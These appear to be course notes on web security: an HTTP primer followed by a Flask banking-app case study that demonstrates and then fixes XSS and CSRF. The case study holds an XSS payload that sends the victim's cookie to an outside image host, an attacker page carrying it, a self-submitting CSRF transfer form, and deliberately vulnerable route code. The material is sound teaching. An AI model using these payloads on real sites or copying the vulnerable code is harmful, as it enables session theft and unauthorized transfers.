Why not get started with this one-hour free course by Troy Hunt?
You might be able to understand some of the big themes of web security and some of the more common exploits (such as XSS and CSRF) just by being a web user, but you’ve got to understand a lot of technical details before you are truly able to build and deploy secure web applications.
Technically, what we call the “World Wide Web” is a collection of resources available over the global Internet via HTTP.
Unfamiliar with HTTP? Read the Wikipedia article on it. It’s good. In practice, people (should) use HTTPS, which is actually HTTP over TLS. There’s a Wikipedia article on this too.
Also watch this great crash course:
If you read the article or watched the video, or are already an expert, great, let’s summarize what you absolutely must know about HTTP:
┌──────────┬──────────┬───────────┐
│  METHOD  │  TARGET  │  VERSION  │   Request Line, must end with CRLF
├──────────┴──────────┴───────────┤
│ Header1: Value1                 │   Zero or more request headers
│ Header2: Value2                 │   Each line ends with CRLF
│ Header3: Value3                 │   Must be one EXTRA CRLF at end
│ ...                             │
│ HeaderN: ValueN                 │
├─────────────────────────────────┤
│ Body                            │   Optional Body
│ of                              │
│ the                             │
│ request                         │
└─────────────────────────────────┘
The method is one of: GET, POST, PUT, PATCH, DELETE, HEAD, CONNECT, OPTIONS, TRACE. The target is a URL or a path to a resource. Version is HTTP/1.0, HTTP/1.1, or HTTP/2.
┌───────────┬──────────────┬──────────┐
│  VERSION  │  STATUSCODE  │  REASON  │   Status Line
├───────────┴──────────────┴──────────┤
│ Header1: Value1                     │   Zero or more response headers
│ Header2: Value2                     │   Each line ends with CRLF
│ Header3: Value3                     │   Must be one EXTRA CRLF at end
│ ...                                 │
│ HeaderN: ValueN                     │
├─────────────────────────────────────┤
│ Body                                │   Optional Body
│ of                                  │
│ the                                 │
│ response                            │
└─────────────────────────────────────┘
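To make the two layouts concrete, here is a minimal sketch that assembles a request and takes apart a response using nothing but string handling. The function names build_request and parse_response are made up for this illustration, and the parser is deliberately naive (it assumes a well-formed HTTP/1.x message with a reason phrase); real code should use an HTTP library.

```python
def build_request(method, target, headers, body=b""):
    """Assemble an HTTP/1.1 request: request line, headers, blank line, body."""
    lines = [f"{method} {target} HTTP/1.1"]
    lines += [f"{name}: {value}" for name, value in headers.items()]
    # Every line ends with CRLF, and one EXTRA CRLF closes the header section.
    head = "\r\n".join(lines) + "\r\n\r\n"
    return head.encode("ascii") + body


def parse_response(raw):
    """Split a raw response into version, status code, reason, headers, body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *header_lines = head.decode("iso-8859-1").split("\r\n")
    version, status_code, reason = status_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return version, int(status_code), reason, headers, body


print(build_request("GET", "/index.html", {"Host": "example.com"}))
print(parse_response(b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n"))
```

Header names are lowercased in the parsed result because HTTP header names are case-insensitive.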
HTTP was designed with the advantages of a REST architecture (REpresentational State Transfer), namely:
Many programming languages allow you to write programs that communicate over HTTP:
- JavaScript (Node.js) has several libraries: http, http2, and https.
- Python has the http library built-in, but most people use the third-party Requests library.
- Java has a native HTTP package, but again, third-party solutions are often used in practice.
- Ruby has the net/http package.
- Go has the net/http package.
We say the program making the requests is a web client and the program making the responses is a web server.
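As a small illustration of both roles in one script, the following sketch uses only Python’s built-in http.server and http.client modules. The HelloHandler class and fetch_once function are names invented for this example; the server binds to a free port on 127.0.0.1 and is torn down after one request.

```python
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer


class HelloHandler(BaseHTTPRequestHandler):
    """Web server side: answers every GET with a small plain-text body."""

    def do_GET(self):
        body = b"hello from the server\n"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, format, *args):
        pass  # silence the default per-request logging


def fetch_once(path="/"):
    """Start a throwaway server on a free local port and request `path`."""
    server = HTTPServer(("127.0.0.1", 0), HelloHandler)  # port 0 = any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    conn = HTTPConnection("127.0.0.1", server.server_address[1], timeout=5)
    try:
        conn.request("GET", path)  # web client side
        response = conn.getresponse()
        return response.status, response.reason, response.read()
    finally:
        conn.close()
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    print(fetch_once())
```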
When a web server is built to provide raw data to clients (like weather information, stock data, and so on) we call the server program a web service. But when the client is a web browser and the client and server work together to make an interactive application for people, we call the combined program a web application.
Web services will generally use JSON (or XML or similar) for the majority of their request and response payloads; web apps will respond with a lot of HTML, images and other media. Web apps will make use of web services to fill in parts of their “pages” (or, strictly speaking, “documents”) dynamically.
It’s probably best not to get too hung up on the differences between web apps and web services.
HTTP is stateless, so how does one “stay logged in” or preserve a shopping cart from page to page to page? The answer is cookies.
If a user makes a request to shop.example.com, the server can send a cookie in a response. The cookie carries information (key-value pairs, generally) about the user’s session. The web browser will send the cookie back on the next request. Cookies can store anything. Typically you will see authentication tokens and shopping-cart state (or ids).
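The round trip can be sketched with Python’s built-in http.cookies module: the server produces the value of a Set-Cookie response header, and later parses the Cookie request header the browser sends back. The cookie name session_id and both helper functions are assumptions made for this example.

```python
from http.cookies import SimpleCookie


def build_set_cookie(session_id):
    """Value of a Set-Cookie response header carrying a session id."""
    cookie = SimpleCookie()
    cookie["session_id"] = session_id
    cookie["session_id"]["path"] = "/"
    cookie["session_id"]["httponly"] = True  # hide the cookie from scripts
    cookie["session_id"]["secure"] = True    # only send it over HTTPS
    return cookie["session_id"].OutputString()


def parse_cookie_header(header_value):
    """Turn the Cookie request header back into a plain dict."""
    cookie = SimpleCookie()
    cookie.load(header_value)
    return {name: morsel.value for name, morsel in cookie.items()}


print("Set-Cookie:", build_set_cookie("abc123"))
print(parse_cookie_header("session_id=abc123; cart=42"))
```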
“The” SOP (Same-Origin Policy) is more or less a set of rules that browsers put in place to restrict the way scripts downloaded from one origin (scheme + host + port) access or manipulate content from another origin.
The precise rules are pretty lengthy, and there are exceptions and slight differences so get the details at: Wikipedia, MDN, W3C, and PortSwigger.
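The core comparison can be sketched in a few lines: two URLs share an origin when scheme, host, and port all match, and the path plays no part. The helper names below are invented for this illustration, and the sketch ignores the exceptions and special cases covered by the references above.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin(url):
    """Return the (scheme, host, port) triple that identifies an origin."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    port = parts.port or DEFAULT_PORTS.get(scheme)  # fill in the implicit port
    return (scheme, host, port)


def same_origin(url_a, url_b):
    return origin(url_a) == origin(url_b)


print(same_origin("https://shop.example.com/cart",
                  "https://shop.example.com:443/checkout"))
print(same_origin("http://shop.example.com/", "https://shop.example.com/"))
```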
Now, let’s switch to web security, namely, how to build and defend applications and services deployed on the web. The topic is massive. But there’s help. The Open Web Application Security Project® (OWASP) is a nonprofit foundation providing information, tools, resources, community, conferences, training, and education for everyone.
Many security principles are web-specific. Here are some big ones:
The Web Security Checklist from Probe.ly
This checklist can be useful.
It’s good to familiarize yourself with, or review, the most common and well-known vulnerabilities and attacks that are highly specific to web applications. Three of the big ones are:
A few other attacks common in web applications are actually specific to networking or TCP (SYN Flooding, etc.), or are things like SQL Injection, which could happen outside the web. But they still fall under the umbrella of “web security.” For a much larger overview of web security topics and specific vulnerabilities and defenses:
What tools and techniques are available to front-end developers?
What tools and techniques are available to back-end developers?
Your server should not accept any HTTP traffic at all. Only do HTTPS.
Cross-Origin Resource Sharing is a mechanism to allow a browser to access certain resources from domains other than the one from which the script making the access request was loaded. It gets set up server-side. It’s complex. Read the details at: Wikipedia, MDN, and PortSwigger.
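The server-side part, at its simplest, is a decision about which response headers to send for a given Origin request header. The sketch below shows only that decision; the allowlist contents and the cors_headers function are hypothetical, and real deployments also have to handle preflight requests and credentials as described in the references.

```python
# Hypothetical allowlist: origins that may read this server's responses.
ALLOWED_ORIGINS = {"https://app.example.com"}


def cors_headers(request_origin):
    """Headers to add to a response for a request carrying this Origin."""
    if request_origin in ALLOWED_ORIGINS:
        return {
            # Echo back the specific origin rather than using a wildcard.
            "Access-Control-Allow-Origin": request_origin,
            # Tell caches that the response varies by requesting origin.
            "Vary": "Origin",
        }
    return {}  # no CORS headers: the browser blocks cross-origin reads


print(cors_headers("https://app.example.com"))
print(cors_headers("https://evil.example.net"))
```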
The HTTP standard specifies that one of its headers be called Authorization and its value can be used for, get this, authentication. I don’t make the rules.
The authentication schemes to know are Basic, Digest, and Bearer. There are others, of course. There is a good write up of the basics at MDN. Also see a nice overview of authentication vulnerabilities at PortSwigger.
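As an illustration of the simplest scheme, Basic, the header value is just the word Basic followed by the Base64 encoding of username:password. The two helper functions are named for this example only. Note that Base64 is an encoding, not encryption, which is one reason Basic is only acceptable over HTTPS.

```python
import base64


def basic_auth_header(username, password):
    """Value of the Authorization header for the Basic scheme."""
    raw = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def parse_basic_auth(header_value):
    """Recover (username, password), or None if the scheme is not Basic."""
    scheme, _, encoded = header_value.partition(" ")
    if scheme.lower() != "basic":
        return None
    decoded = base64.b64decode(encoded).decode("utf-8")
    username, _, password = decoded.partition(":")
    return username, password


header = basic_auth_header("Aladdin", "open sesame")
print("Authorization:", header)
print(parse_basic_auth(header))
```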
It’s not considered a good idea to pass one’s username and password along on every single request. Instead, one sends the credentials to an auth server and gets back a token to use on subsequent requests. To see why this is the way to go, read about tokens at Wikipedia, Okta, the JWT home page, and Auth0.
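To show the idea behind signed tokens without any third-party library, here is a simplified sketch: the server signs a small payload with a secret key using HMAC-SHA256, and later accepts the token only if the signature matches and the expiry has not passed. This is a stand-in for illustration, not the JWT format itself; the function names and the payload layout are assumptions.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _sign(payload, key):
    return _b64(hmac.new(key, payload.encode("ascii"), hashlib.sha256).digest())


def issue_token(subject, key, ttl_seconds=3600, now=None):
    """Return 'payload.signature' for the given subject."""
    issued = int(time.time() if now is None else now)
    claims = {"sub": subject, "exp": issued + ttl_seconds}
    payload = _b64(json.dumps(claims).encode("utf-8"))
    return f"{payload}.{_sign(payload, key)}"


def verify_token(token, key, now=None):
    """Return the subject if the token is authentic and unexpired, else None."""
    payload, _, signature = token.partition(".")
    try:
        expected = _sign(payload, key)
    except UnicodeEncodeError:
        return None  # payload was not even ASCII, so it cannot be ours
    # Constant-time comparison avoids leaking how many characters matched.
    if not hmac.compare_digest(signature.encode("utf-8"), expected.encode("utf-8")):
        return None
    claims = json.loads(_unb64(payload))
    current = time.time() if now is None else now
    return claims["sub"] if claims["exp"] >= current else None
```

The signature is checked before the payload is parsed, so tampered tokens are rejected without their contents ever being trusted.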
Most folks know of OAuth as that thing that happens when you log in to some site "through Google" or "through GitHub" or "through Twitter." Find details at Wikipedia and PortSwigger.
If you have a web service, it is your duty to expose services via HTTPS, which is just a fancy way of saying HTTP over a transport layer that encrypts the HTTP stream. Having encryption applied at the transport layer is amazing, since it means that web applications do not have to do the encryption themselves. Server administrators do have to set things up right, getting certificates in place and all that. Find out more at Wikipedia and MDN.
TLS 1.2+ Please
TLS replaces SSL, so SSL is obsolete. Also TLS versions prior to 1.2 should no longer be used.
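In Python, one way to enforce this floor on the client side is through the standard ssl module, as in the following sketch. The function name make_client_context is invented for the example; recent Python versions may already default to this minimum, so the explicit setting mainly documents intent.

```python
import ssl


def make_client_context():
    """TLS client context that refuses anything older than TLS 1.2."""
    context = ssl.create_default_context()  # verifies certificates and hostnames
    context.minimum_version = ssl.TLSVersion.TLSv1_2
    return context


context = make_client_context()
print(context.minimum_version)
```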
There is so much to test in a web app: front end, back end, communications, authentication, you name it. As the security concerns are massive, a number of tools and best practices have evolved for security-focused testing on the web.
The most famous suite of tools is probably Burp Suite by the company PortSwigger. There is an article about what Burp Suite is at Geeks For Geeks. PortSwigger also has a nice collection of research articles in web security.
Let’s check out how the Flask Web Framework for Python helps us avoid the three most common web attacks. First, visit the Flask project page and read the User Guide at least through the Tutorial. We’re going to create a small web application with the following endpoints that will simulate a banking app:
We want to be careful not to allow XSS attacks that could happen if we put script elements in the withdraw memo field. Also we want to be careful not to allow CSRF attacks by an attacker tricking us into doing a POST /withdraw from a malicious fake page or nasty link in a phishing email. We’ll be careful to prevent SQL Injection when looking up the email and password during login.
Fundamentals First
We will do this case study in two phases. In the first phase we will implement defenses using only the most basic tools available in Python and Flask. This means our CSRF protection will come from manually doing double-submit cookies and SQL Injection protection with prepared statements. In the second phase, we’ll bring in the heavyweight external libraries Flask-WTF (for CSRF protection) and Flask-Login, which automatically handles a lot of login concerns.
In real apps, you should go straight to using the powerful libraries! We are showing low-level defenses for educational purposes only; it’s too risky to do this on your own in practice.
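For orientation, the double-submit idea can be sketched as follows: the server hands out a random token both in a cookie and in a hidden form field, and on each POST accepts the request only when the two copies match. An attacker’s page can make the browser send the cookie but cannot read it, so it cannot fill in the matching form field. The function names here are invented for this sketch and are not taken from Flask.

```python
import hmac
import secrets


def new_csrf_token():
    """Random token to place in both a cookie and a hidden form field."""
    return secrets.token_urlsafe(32)


def csrf_check_passes(cookie_token, form_token):
    """Accept the request only if both copies are present and identical."""
    if not cookie_token or not form_token:
        return False
    # Constant-time comparison, as with any secret value.
    return hmac.compare_digest(cookie_token.encode("utf-8"),
                               form_token.encode("utf-8"))


token = new_csrf_token()
print(csrf_check_passes(token, token))  # legitimate form post
print(csrf_check_passes(token, None))   # forged post without the field
```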
Here are the steps (Notes here are for Unix-based systems, not Windows; however, some of the Windows commands needed are found on the Installation page in the Flask docs.)
python3 -m venv env
. env/bin/activate
pip install Flask Flask-WTF PyJWT passlib
(Weirdly, you might have to deactivate the virtual environment and reactivate it after this. Might as well do that to be safe.)
export FLASK_ENV=development
(to enable automatic server restart after code changes; FLASK_ENV was removed in Flask 2.3, so on newer versions use export FLASK_DEBUG=1 instead)
from flask import Flask, request, make_response, redirect

app = Flask(__name__)

# DANGER WARNING: Even though Flask lets us manufacture and return
# our own strings we should never do this. We are illustrating
# horrible code on purpose to show what vulnerabilities look like.
# Don't ever do this in practice.

@app.route("/", methods=['GET'])
def home():
    return """
        <p>This is just a fake form for now, submit anything</p>
        <form method="post" action="/login">
        <p>Email: <input type="text" name="email"></p>
        <p>Password: <input type="password" name="password"></p>
        <p><input type="submit" value="Login"></p></form>"""

@app.route("/login", methods=["POST"])
def login():
    # For now, we're just getting started, so assume login is
    # always okay and just deliver a fake authentication token.
    # We'll do real auth later after the XSS and CSRF demos.
    request.form.get("email")
    request.form.get("password")
    response = make_response(redirect("/dashboard"))
    response.set_cookie("auth_token", "Fake-token-for-now")
    return response, 303

@app.route("/dashboard", methods=['GET'])
def dashboard():
    return """
        <h1>What would you like to do today?</h1>
        <p><a href="/details?account=100">Savings account details</a></p>
        <p><a href="/details?account=998">Checking account details</a></p>
        <p><a href="/transfer">Transfer</a></p>"""

@app.route("/details", methods=['GET', 'POST'])
def details():
    account_number = request.args['account']
    # DANGER DANGER BAD BAD BAD XSS VULNERABILITY
    return f"""
        <h1>Details for Account {account_number}</h1>
        <p>Details coming soon
        <p><a href="/dashboard">Back to Dashboard</a></p>"""

@app.route("/transfer", methods=["GET"])
def transfer():
    return """
        <h1>Make a Transfer</h1>
        <p>Transfer implementation coming soon</p>
        <p><a href="/dashboard">Back to Dashboard</a></p>"""
flask run
localhost:5000
and see the login form. Submit to go to the dashboard.
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
BAM! OH SNAP! IT IS VULNERABLE!
%3Cscript%3Edocument.write%28%22%3Cimg+src%3D%27https:%2F%2Fcs.lmu.edu%2F~ray%2Fimages%2Fdogfire.png%3Fc%3D%22%2Bdocument.cookie%2B%22%27%3E%22%29%3C/script%3E
Try it by pasting this over the account number in the browser address bar. Look in the Network tab to see the auth token sent to the attacker’s server. (Here we assume the attacker logs all requests so it can easily grab the stolen cookie.) The dog fire picture was a very blatant way to tell the user they’ve been pwned, but in reality malicious actors are quieter; their image would be a transparent pixel, so the victim doesn’t really know anything is wrong...yet.
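If the percent-encoded payloads look opaque, Python’s urllib.parse can translate in both directions. This short sketch decodes the alert payload and shows how the same string would be produced from the raw script element.

```python
from urllib.parse import quote, unquote

encoded = "%3Cscript%3Ealert%281%29%3C%2Fscript%3E"

# Decoding reveals the script element the server will echo into the page.
print(unquote(encoded))  # <script>alert(1)</script>

# Encoding the raw markup (with no characters treated as safe) gives it back.
print(quote("<script>alert(1)</script>", safe=""))
```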
<html>
  <body>
    <h1>Welcome to the Cat Pictures Website</h1>
    <p>
      <a href="http://localhost:5000/details?account=%3Cscript%3Edocument.write%28%22%3Cimg+src%3D%27https:%2F%2Fcs.lmu.edu%2F~ray%2Fimages%2Fdogfire.png%3Fc%3D%22%2Bdocument.cookie%2B%22%27%3E%22%29%3C/script%3E">
        Browse the Gallery!
      </a>
    </p>
  </body>
</html>
from markupsafe import escape
at the top and changing all the routes that return strings to return escape(the_string) as needed. Try it out if you wish, and note that the attack has been defeated.
markupsafe isn’t the most general or best solution. In real life we should never compose HTML directly like this; instead, our HTML should always be created by Flask templates. Create the following files:
templates/login.html
<p>This is just a fake form for now, submit anything</p>
<form method="post" action="/login">
  <p>Email: <input type="text" name="email" /></p>
  <p>Password: <input type="password" name="password" /></p>
  <p><input type="submit" value="Login" /></p>
</form>
templates/dashboard.html
<h1>What would you like to do today?</h1>
<p><a href="/details?account=100">Savings account details</a></p>
<p><a href="/details?account=998">Checking account details</a></p>
<p><a href="/transfer">Transfer</a></p>
templates/details.html
<h1>Details for Account {{account_number}}</h1>
<p>Details coming soon</p>
<p><a href="/dashboard">Back to Dashboard</a></p>
templates/transfer.html
<h1>Make a Transfer</h1>
<p>Transfer implementation coming soon</p>
<p><a href="/dashboard">Back to Dashboard</a></p>
from flask import Flask, request, make_response, redirect, render_template

app = Flask(__name__)

@app.route("/", methods=['GET'])
def home():
    return render_template("login.html")

@app.route("/login", methods=["POST"])
def login():
    # For now, we're just getting started, so assume login is
    # always okay and just deliver a fake authentication token.
    # We'll do real auth later after the XSS and CSRF demos.
    request.form.get("email")
    request.form.get("password")
    response = make_response(redirect("/dashboard"))
    response.set_cookie("auth_token", "Fake-token-for-now")
    return response, 303

@app.route("/dashboard", methods=['GET'])
def dashboard():
    return render_template("dashboard.html")

@app.route("/details", methods=['GET', 'POST'])
def details():
    account_number = request.args['account']
    return render_template("details.html", account_number=account_number)

@app.route("/transfer", methods=["GET"])
def transfer():
    return render_template("transfer.html")
and note that the template system automatically prevents XSS!
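What defeats the attack in both cases is HTML escaping of the untrusted value before it lands in the page. The following sketch shows the transformation using html.escape from the standard library as a stand-in; it plays the same role as markupsafe’s escape and the template engine’s autoescaping, though the exact entity spellings can differ slightly. The render_details function is made up for the example.

```python
from html import escape


def render_details(account_number):
    """Build the heading with the untrusted value escaped."""
    return f"<h1>Details for Account {escape(account_number)}</h1>"


# The script element arrives as inert text instead of executable markup.
print(render_details("<script>alert(1)</script>"))
# <h1>Details for Account &lt;script&gt;alert(1)&lt;/script&gt;</h1>
```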
Now let’s implement POST /login properly. To log in, we check a database to see if there is a user with the given email and a password hash that matches the hash of the submitted password. If such a user exists, we will generate a token that proves the user is authenticated for subsequent calls, put that in a cookie, then redirect to the GET /dashboard route. Let’s create a database. In real life, we’d use a secure, well-administered database. We’re all students here, so we can use SQLite, a built-in database included with Python, and store this on our development machine. This is totally fine for learning.
Let’s use this little script to create a database and populate it with two users, Alice and Bob, who aren’t the most tech-savvy: they both use the password 123456. Our user table will store their email address as the key, their print name, and their password hash. We will hash passwords with PBKDF2 SHA256 for this, which is in passlib. Call this script bin/createdb.py:
import sqlite3
from passlib.hash import pbkdf2_sha256

con = sqlite3.connect('bank.db')
cur = con.cursor()
cur.execute('''
    CREATE TABLE users (
        email text primary key, name text, password text)''')
cur.execute(
    "INSERT INTO users VALUES (?, ?, ?)",
    ('alice@example.com', 'Alice Xu', pbkdf2_sha256.hash("123456")))
cur.execute(
    "INSERT INTO users VALUES (?, ?, ?)",
    ('bob@example.com', 'Bobby Tables', pbkdf2_sha256.hash("123456")))
con.commit()
con.close()
Note we are using bound parameters and not string-interpolating anything into our SQL. We’re not even going to demonstrate SQL Injection here. We did that earlier in this class. Let’s just jump right to the bound-parameters thing. (IRL, we’d probably use a programmatic database interface, which is even better, but bound parameters will do for now.)
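To see why bound parameters are safe, here is a small self-contained sketch against an in-memory SQLite database. The make_demo_db and find_user helpers are invented for the illustration. A hostile string passed as a parameter is treated purely as data, so it simply fails to match any row.

```python
import sqlite3


def make_demo_db():
    """In-memory database with one user, just for this demonstration."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (email text primary key, name text)")
    con.execute("INSERT INTO users VALUES (?, ?)",
                ("alice@example.com", "Alice Xu"))
    return con


def find_user(con, email):
    # The ? placeholder keeps the value out of the SQL text entirely.
    cur = con.execute(
        "SELECT email, name FROM users WHERE email = ?", (email,))
    return cur.fetchone()


con = make_demo_db()
print(find_user(con, "alice@example.com"))
print(find_user(con, "' OR '1'='1"))  # classic injection string, no match
con.close()
```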
$ sqlite3 bank.db
SQLite version 3.36.0 2021-06-18 18:58:49
Enter ".help" for usage hints.
sqlite> select * from users;
alice@example.com|Alice Xu|$pbkdf2-sha256$29000$e8/5H8M4J4Twvtc6x5gTYg$N4xxoh3lOsJdvnjhlXFIu7ZMg3AD7xTMQxQSqQPYRC4
bob@example.com|Bobby Tables|$pbkdf2-sha256$29000$9x4jRMjZWwtBCME4x1hrrQ$9XTlZjB0IcU5uKUpzdlJQhV58MxOO7gcQVL5ZsDA2n0
sqlite> .quit
Note that Passlib’s pbkdf2 hash function automatically salted the hashes!
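That is why Alice and Bob have different stored hashes even though they chose the same password. The effect can be reproduced with the standard library alone, as in this sketch; it illustrates the principle and is not Passlib’s internal code. The helper names are made up, and the iteration count simply mirrors the 29000 visible in the stored hashes.

```python
import hashlib
import hmac
import os

ITERATIONS = 29000  # mirrors the round count visible in the stored hashes


def hash_password(password, salt=None):
    """Return (salt, digest); a fresh random salt is drawn when none is given."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac(
        "sha256", password.encode("utf-8"), salt, ITERATIONS)
    return salt, digest


def verify_password(password, salt, digest):
    """Re-hash with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


salt_a, hash_a = hash_password("123456")
salt_b, hash_b = hash_password("123456")
print(hash_a != hash_b)                          # same password, different hashes
print(verify_password("123456", salt_a, hash_a))
```

Because each user gets a different salt, an attacker who steals the table cannot spot shared passwords at a glance or reuse one precomputed table against every row.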
/
. To handle this, we write a logged_in function which will check the auth token in the cookie and, if it is verified, put the email in g, Flask’s per-request global object. Create the service in the file user_service.py:
import sqlite3
from datetime import datetime, timedelta, timezone
from passlib.hash import pbkdf2_sha256
from flask import request, g
import jwt

# Hard-coded here only to keep the demo short. A real app must load
# its signing secret from configuration, never from source code.
SECRET = 'bfg28y7efg238re7r6t32gfo23vfy7237yibdyo238do2v3'

def get_user_with_credentials(email, password):
    con = sqlite3.connect('bank.db')
    try:
        cur = con.cursor()
        cur.execute('''
            SELECT email, name, password FROM users where email=?''',
            (email,))
        row = cur.fetchone()
        if row is None:
            return None
        email, name, password_hash = row
        if not pbkdf2_sha256.verify(password, password_hash):
            return None
        return {"email": email, "name": name, "token": create_token(email)}
    finally:
        con.close()

def logged_in():
    token = request.cookies.get('auth_token')
    try:
        # Raises InvalidTokenError for missing, tampered, or expired tokens
        data = jwt.decode(token, SECRET, algorithms=['HS256'])
        g.user = data['sub']
        return True
    except jwt.InvalidTokenError:
        return False

def create_token(email):
    now = datetime.now(timezone.utc)
    payload = {'sub': email, 'iat': now, 'exp': now + timedelta(minutes=60)}
    token = jwt.encode(payload, SECRET, algorithm='HS256')
    return token
and modify app.py as needed:
from flask import Flask, request, make_response, redirect, render_template, g
from user_service import get_user_with_credentials, logged_in

app = Flask(__name__)

@app.route("/", methods=['GET'])
def home():
    if not logged_in():
        return render_template("login.html")
    return redirect('/dashboard')

@app.route("/login", methods=["POST"])
def login():
    email = request.form.get("email")
    password = request.form.get("password")
    user = get_user_with_credentials(email, password)
    if not user:
        return render_template("login.html", error="Invalid credentials")
    response = make_response(redirect("/dashboard"))
    response.set_cookie("auth_token", user["token"])
    return response, 303

@app.route("/dashboard", methods=['GET'])
def dashboard():
    if not logged_in():
        return render_template("login.html")
    return render_template("dashboard.html", email=g.user)

@app.route("/details", methods=['GET', 'POST'])
def details():
    if not logged_in():
        return render_template("login.html")
    account_number = request.args['account']
    return render_template("details.html", account_number=account_number)

@app.route("/transfer", methods=["GET"])
def transfer():
    if not logged_in():
        return render_template("login.html")
    return render_template("transfer.html")
and allow the login page to display the error. The new templates/login.html should be:
{% if error %}
<p style="color: red">{{ error }}</p>
{% endif %}
<form method="post" action="/login">
  <p>Email: <input type="text" name="email" /></p>
  <p>Password: <input type="password" name="password" /></p>
  <p><input type="submit" value="Login" /></p>
</form>
<p><a href="/logout">Logout</a></p>
And we will implement the new handler on the server to clear the cookie:
@app.route("/logout", methods=['GET'])
def logout():
    response = make_response(redirect("/dashboard"))
    response.delete_cookie('auth_token')
    return response, 303
Practice with this.
<p>Hi, {{ user }}</p>
<h1>Details for Account {{account_number}}</h1>
<p>Your balance is {{ balance }}</p>
<p><a href="/dashboard">Back to Dashboard</a></p>
and the transfer template:
<h1>Make a Transfer</h1>
<form method="POST" action="/transfer">
<pre>
From   <input name="from" />
To     <input name="to" />
Amount <input name="amount" />
<input type="submit" value="Transfer">
</pre>
<!-- WARNING WARNING THERE IS A CSRF VULNERABILITY HERE!!! -->
<!-- WE WILL BE FIXING IT LATER. -->
</form>
<p><a href="/dashboard">Back to Dashboard</a></p>
import sqlite3

con = sqlite3.connect('bank.db')
cur = con.cursor()
cur.execute('''
    CREATE TABLE accounts (
        id text primary key, owner text, balance integer,
        foreign key(owner) references users(email))''')
cur.execute(
    "INSERT INTO accounts VALUES (?, ?, ?)",
    ('100', 'alice@example.com', 7500))
cur.execute(
    "INSERT INTO accounts VALUES (?, ?, ?)",
    ('190', 'alice@example.com', 200))
cur.execute(
    "INSERT INTO accounts VALUES (?, ?, ?)",
    ('998', 'bob@example.com', 1000))
con.commit()
con.close()
import sqlite3

def get_balance(account_number, owner):
    con = sqlite3.connect('bank.db')
    try:
        cur = con.cursor()
        cur.execute('''
            SELECT balance FROM accounts where id=? and owner=?''',
            (account_number, owner))
        row = cur.fetchone()
        if row is None:
            return None
        return row[0]
    finally:
        con.close()

def do_transfer(source, target, amount):
    con = sqlite3.connect('bank.db')
    try:
        cur = con.cursor()
        cur.execute('''
            SELECT id FROM accounts where id=?''',
            (target,))
        row = cur.fetchone()
        if row is None:
            return False
        cur.execute('''
            UPDATE accounts SET balance=balance-? where id=?''',
            (amount, source))
        cur.execute('''
            UPDATE accounts SET balance=balance+? where id=?''',
            (amount, target))
        con.commit()
        return True
    finally:
        con.close()
Here are the updates necessary for two new endpoints in app.py:
@app.route("/details", methods=['GET'])
def details():
    if not logged_in():
        return render_template("login.html")
    account_number = request.args['account']
    return render_template(
        "details.html",
        user=g.user,
        account_number=account_number,
        balance=get_balance(account_number, g.user))

@app.route("/transfer", methods=["POST"])
def transfer():
    if not logged_in():
        return render_template("login.html")
    source = request.form.get("from")
    target = request.form.get("to")
    try:
        amount = int(request.form.get("amount"))
    except (TypeError, ValueError):
        # A missing or non-numeric amount is a client error, not a crash
        abort(400, "Amount must be a whole number")
    if amount < 0:
        abort(400, "NO STEALING")
    if amount > 1000:
        abort(400, "WOAH THERE TAKE IT EASY")
    # Looking up the balance by owner also proves the source account is ours
    available_balance = get_balance(source, g.user)
    if available_balance is None:
        abort(404, "Account not found")
    if amount > available_balance:
        abort(400, "You don't have that much")
    if do_transfer(source, target, amount):
        pass  # TODO GIVE FEEDBACK
    else:
        abort(400, "Something bad happened")
    response = make_response(redirect("/dashboard"))
    return response, 303
abort
.
<html>
  <body>
    <h1>Welcome to the Cat Pictures Website</h1>
    <form action="http://localhost:5000/transfer" method="POST">
      <input type="hidden" name="amount" value="100" />
      <input type="hidden" name="from" value="998" />
      <input type="hidden" name="to" value="666" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
from flask_wtf.csrf import CSRFProtect

app.config['SECRET_KEY'] = 'yoursupersecrettokenhere'
csrf = CSRFProtect(app)
Make sure to generate a good, cryptographically secure random token. Next, add to each form:
<input type="hidden" name="csrf_token" value="{{ csrf_token() }}" />
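For the SECRET_KEY value mentioned above, one reasonable way to produce a cryptographically secure random token is Python’s secrets module, as sketched here. The generate_secret_key function is a name invented for the example; the key should be generated once and kept in configuration, not regenerated on every start and not committed to source control.

```python
import secrets


def generate_secret_key(num_bytes=32):
    """Return a random key as a hex string (two hex digits per byte)."""
    return secrets.token_hex(num_bytes)


print(generate_secret_key())
```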
Now when you go to localhost:9000/evil.html, the output page says: “Bad Request / The CSRF token is missing.”
FlaskForm class, which makes validation super nice. We’ll leave it to you to check out the documentation and rewrite our example using proper Flask form handling. Enjoy.
We’ve covered: